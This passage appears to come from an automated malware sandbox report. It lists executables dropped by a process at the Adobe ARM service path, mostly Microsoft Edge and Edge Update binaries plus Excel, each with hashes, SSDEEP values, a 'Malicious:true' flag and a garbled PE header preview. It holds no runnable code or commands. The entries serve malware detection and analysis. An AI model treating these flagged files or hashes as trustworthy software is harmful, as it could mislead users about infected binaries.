                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1574400
                                                                                                                                                  Entropy (8bit):4.962254123522496
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:/AZHHrUZF/S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:/e4ZFSLNiXicJFFRGNzj3
                                                                                                                                                  MD5:6E2942B3938F4E34ADA923E0597DD61F
                                                                                                                                                  SHA1:58F6D2D8FCFB621DB86E5F01E7BAD7891B2D1181
                                                                                                                                                  SHA-256:EF02A7615F93F003DC079039876CB4FCDDC797730C387891F35A5BA9A24A0FAF
                                                                                                                                                  SHA-512:A3A91C845D429E6B162A66E81C3AD3609D69B60A17989AF91D92D5852D8D9C6994056FDEE2AB3431B1688B3C7A08213252540D51FC510A30C3F136792AFC0F50
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@...........................#......N..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...............F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):53721600
                                                                                                                                                  Entropy (8bit):6.54314106368072
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1572864:GNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:GQ9lw68HSq
                                                                                                                                                  MD5:03F7E82373A773C04C40C4CCF9811849
                                                                                                                                                  SHA1:5E8172E20076ACFF9D2AEA1A513735BEE92EE63F
                                                                                                                                                  SHA-256:72047669775EDB5164C10BFAE8406C3BD8F3C4EA495E65875B7F6BD8DC54E0B8
                                                                                                                                                  SHA-512:3A7784AE58CB421AADEA7576C6A5A350A5407DD8689E24ADF4DB1E0E6D132498A293AB7852EDBA6904153EE18DCD9847128037A86D1488F352EEDCF304525BFC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.....0R4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1812992
                                                                                                                                                  Entropy (8bit):5.250015295289358
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7d8DMeflpnIOvYUk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7CDD9pnIOWLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1BF7F1B149AE7AF7FB56398B704AF1A8
                                                                                                                                                  SHA1:7CDD4DCFEDCDB1D7135FDA71E92B8FA558F577BB
                                                                                                                                                  SHA-256:317346C353B1FADB92651E7714416F76EE861638F8B99515327780EC6C2DBC6F
                                                                                                                                                  SHA-512:A7091BE61E3AD5FAB14CE7E74C95D30949F1A586DA725EB986DC37F10532DD0F0B2BB86813AC968CC73D272EE6CE000CB0C6D1A53BA59B35B824C96B49127EA9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'......z.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4364800
                                                                                                                                                  Entropy (8bit):6.745653091201487
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:8B1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EtLNiXicJFFRGN:2HzorVmr2gkRpdJYolj7wRGpj3
                                                                                                                                                  MD5:A1226BDDD97F3B6115A3E61625156B61
                                                                                                                                                  SHA1:65229F00F2E45B31A2D07B87932D450314E0290D
                                                                                                                                                  SHA-256:614800315DB5E90B74E82C49C228BA1CE6E688B68B55F552337E296BA4A966A5
                                                                                                                                                  SHA-512:362EC3C7B780A90A62EFBCDB633ADB2CA0D67A71A0D4318CEDB70D81E821E7AEFEA4D5F513D333E464667654B2262334904DB5E02DADA6C125D70E1E6E0462FB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......bC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1394176
                                                                                                                                                  Entropy (8bit):4.671285533410348
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:qEyTG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xyaLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1148F6FC54F34B3AA2D353F1644B1550
                                                                                                                                                  SHA1:F75D7078FFB60600CF1657D2B50C151C0A136643
                                                                                                                                                  SHA-256:2A7340760D1AFDC82DBF8FE40C41A6C0103E0DC23A05B0C3DA4810D84AE149E1
                                                                                                                                                  SHA-512:1B6EAFB5FBD9B458139AC2280C69AB4E5C86978ECD1766C08D0B5507084CBE598B57BA4B4BA0DB8984CA01D0E4230DA59BFFFD44728908F34ECDF0671F0DE6E3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` ......R.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2354176
                                                                                                                                                  Entropy (8bit):7.045032763676261
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:2hDdVrQ95RW0YQHyWQXE/09Val0GjLNiXicJFFRGNzj3:2hHYWmHyWKc7wRGpj3
                                                                                                                                                  MD5:0B79C87888F1F817B9EF1809AC8DC7F0
                                                                                                                                                  SHA1:63FFD69CD33B44B577C8AA0322DAAF7BB386876A
                                                                                                                                                  SHA-256:2CF8AE9CC641075626AC8C7C995A2A411D606C274964121368A76D6F1A7710A8
                                                                                                                                                  SHA-512:A9D120F9631D41A9A3BDB90FDA464A2D33C0B228D72204995A9A40CBBA4A0F0A9386734EADD7C255F1E8A9707FAF8688CCC04D90BD54EE13C684FBF73959C5AF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1825280
                                                                                                                                                  Entropy (8bit):7.15210152347625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:/70E0ZCQZMib6Rrt9RoctGfmdd9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:T0EzQS7RPRoc15LNiXicJFFRGNzj3
                                                                                                                                                  MD5:CD01EBE3D88A1467F671D92E467A6EBE
                                                                                                                                                  SHA1:104CD36EAB7B9205F1161FD60E9875D9AB0859C1
                                                                                                                                                  SHA-256:A9ABD4B1144DEC74E37F58BD74A2E83E57CA68796F1E19ED2DCE77D4C60CCE0C
                                                                                                                                                  SHA-512:73F56B13DDBF352CBB46C3F08A1BC0056CCD9FE3C4B63F79EE391433CB46E2494945157F47770D55AC26702DAAE2A70F7B20731424016B010EFFF5AB8560C190
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......./.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                  Entropy (8bit):7.139181413137103
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:xiD2VmA1YXiHwlklb8boUuWPg2g6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QD2VmAygwIb8boQNLNiXicJFFRGNzj3
                                                                                                                                                  MD5:54173D15F204051B2ACFDCA1C0CD52D4
                                                                                                                                                  SHA1:84194EA3D28192D4BE913531789D9B77B4F70CCC
                                                                                                                                                  SHA-256:0A1CEB58932CCF0C6C82B409CFEC6772E23AB33EAD48A2B788B670E1B3EC3480
                                                                                                                                                  SHA-512:6D546B7B0163BEBF6C8B3D88E956BF31D931FDF6A28595ADD727D6E3AF692594A1D3EFAF5AB351B1A539E8EF47A60E79E92D0609CFC7C15240121CE7F3875066
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2853376
                                                                                                                                                  Entropy (8bit):6.946964401475805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:QfD3zO9ZhBGlohzM3HRNr00FLNiXicJFFRGNzj3:6DaalSzM00F7wRGpj3
                                                                                                                                                  MD5:D80E83CE246D2EF836705BE651C19BE4
                                                                                                                                                  SHA1:94361F862AB1FE8F277F76B65EB157683B07D4F9
                                                                                                                                                  SHA-256:6364FDF5DC5F08AD1E932175B8E0E2921177EF9272015EA7BC4011E3358791A1
                                                                                                                                                  SHA-512:86A86ADD76ED295CC6967A70B53CD653ED717917F192884A265B068E1F68D1242C36694C9563EE6AFA4F73F56349FCE85D3B33EF2F3E263520B5468A9967C002
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-....../,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4320256
                                                                                                                                                  Entropy (8bit):6.8219091890021115
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:VTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPheLNiXicJy:sI72Lvkr4pbxJRoIM97wRGpj3
                                                                                                                                                  MD5:7D767BB2A72DD99654CDA6E8C05E9F59
                                                                                                                                                  SHA1:ACB5EDDE83C94F3EF772666403D52BA291B5F9DA
                                                                                                                                                  SHA-256:46368158295ABF382D59DD1CEC8F94D8C679722A5E2FF675227D0B36F31AA1DE
                                                                                                                                                  SHA-512:E46C910DBE2EAA5FA200974797BDD46A29A8F648B6C973A6735ACB1ECD904985BFCAB884BC547C5BB541B3BD511785D17947E33C68A62139EC53E7F8EA3D63E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....V.B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2062336
                                                                                                                                                  Entropy (8bit):7.091538190635118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:VW9Jml9mmijxiMnF+ZxmQWcbLw8Vt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VWnm5iAMkjmQWkVtLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D77924C075BB32DD490896405BF7C954
                                                                                                                                                  SHA1:EF7DC71A71700D8EE069B19DEEDA1D7489A516DE
                                                                                                                                                  SHA-256:1ABABC68AEE3F0AB0E7470A272116B7142F5AA6F15D3D8982034A13E7C0CB5D5
                                                                                                                                                  SHA-512:B1E17CD0D3B6A3D35A3236A12E1880C9B285C40BB16F7350D26CE05FB5F5BDCF748AC8A5D65EF881F4973D135386E4F3515A43EC65823A8E3FAACD000A69D98B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......y.... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):7.15990573842476
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:lwNHwoYhua6MZERO4qbBJTY6mY1uIgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:lwNPdNO7BJTfmEsLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A32CD7F6030A0C77DFBDF76643CEE33F
                                                                                                                                                  SHA1:3E9C74EB8773EB2FD4FAA3AC70B11FEF69F77F87
                                                                                                                                                  SHA-256:2B7B487956F5CE904953852E9236E43EF4E5BB4196632F7CD1A96C61B6821D77
                                                                                                                                                  SHA-512:162709DA2D11BD1FD72DF62246D677E9829AA4DB3E5438E9568A38DBE90ED1E635930A61C48B8E7ED317099C0C88E247434F1470BF7BA7B19005EF97A6DB288C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                  Entropy (8bit):7.139178706754582
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:viD2VmA1YXiHwlklb8boUuWPg2g6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qD2VmAygwIb8boQNLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1043E2434D6D4C12212BEFD2E85809EA
                                                                                                                                                  SHA1:4E572BEFF9657D11F0B10F0329F7A03E180B0B01
                                                                                                                                                  SHA-256:8923A2948EA8F31C1895BE9062C86A7F4A342F46BA0204AADBD939F33730C6FF
                                                                                                                                                  SHA-512:E8D81A7014D9DF5470151A09D1BC89CBACC0B41B1E7AA6A2A1757E8EA3026089B8BAB099B95359E69CF1374ADD65316ADAE8F92543406F391B058EF863C88F63
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......-..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):7.159897473678515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ywNHwoYhua6MZERO4qbBJTY6mY1uIgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ywNPdNO7BJTfmEsLNiXicJFFRGNzj3
                                                                                                                                                  MD5:01090FCCE9FDC648E90D0582FCFE7619
                                                                                                                                                  SHA1:A0AC00C6DF869165A7BDA15250ED40DE773C9E81
                                                                                                                                                  SHA-256:91289047AA9D03EF60C50E0BBBDE24DC050A3942DE0ABDE952A46CDEB02EC5F5
                                                                                                                                                  SHA-512:2043CCABB0F01E7D62269707A6CDF61C0DEF12F30DC7C702DDD2241B9F75F7951ECEDDE1CE1BBA59890EFDE3B7CD5E007622AAC640B57103BE015E4293B7E720
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................u;.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1481216
                                                                                                                                                  Entropy (8bit):4.6941332206315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:76lbht6BHg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WlNtqHgLNiXicJFFRGNzj3
                                                                                                                                                  MD5:C12D62C1958FC1FEF2FB15A39293073D
                                                                                                                                                  SHA1:3173E20764054674BF944A5C5C09C50A82F0F724
                                                                                                                                                  SHA-256:C3F99914792D4E776B138DB7DD771969835C38D07C445FA56D8468DC8B15798A
                                                                                                                                                  SHA-512:5431E1E9227F392276BC01C98A34104BB1ED1A2C7017E88ED531F166999B6A95D93FA7F78BE15F0EC5B4FE51135CDDA34D4109F16E6F1C344FCA9B8CF9C9957F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                  Entropy (8bit):4.656851590275436
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:eIxkTBVV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zxk1VVLNiXicJFFRGNzj3
                                                                                                                                                  MD5:2DFF104E6391A8D0F521501952E272E9
                                                                                                                                                  SHA1:4A8EDEE3D6AA9ED623B2CE88F0F7431A8D390519
                                                                                                                                                  SHA-256:A5039FE650D030986A9F68C4EC7046AFB3DF2C8213E224905E70B51DEEDBE5B4
                                                                                                                                                  SHA-512:CEB61A7FBA22664E90100BC48EB8315ABB016C29A32AECBFDEC159AD79989802E8A33FF3A3284543D67596103770CD1AE2C857B53712900C44E82987FFE588C5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .............................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1490944
                                                                                                                                                  Entropy (8bit):4.787378249310515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ncssmr4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cbvLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A7104A33FBC7F2A8DBCE04C0FEC163B5
                                                                                                                                                  SHA1:4DC28014D0412B31015FE4BF804D9F61253C8F3F
                                                                                                                                                  SHA-256:04AA38812D6D60E1FCDE3C5B72A836A6718B318C0FF36065AB9D818A03EC6CE2
                                                                                                                                                  SHA-512:9AAE46B1A3D4482A05168250E8504AD7BB0F96093E0E23C40AFA3B207FF63C73690F7C6E6A8993DA1B1F6F84C62C9568E796F0FF8C1C7D92C2ECD7D9F17AA06A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!.....L..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1539584
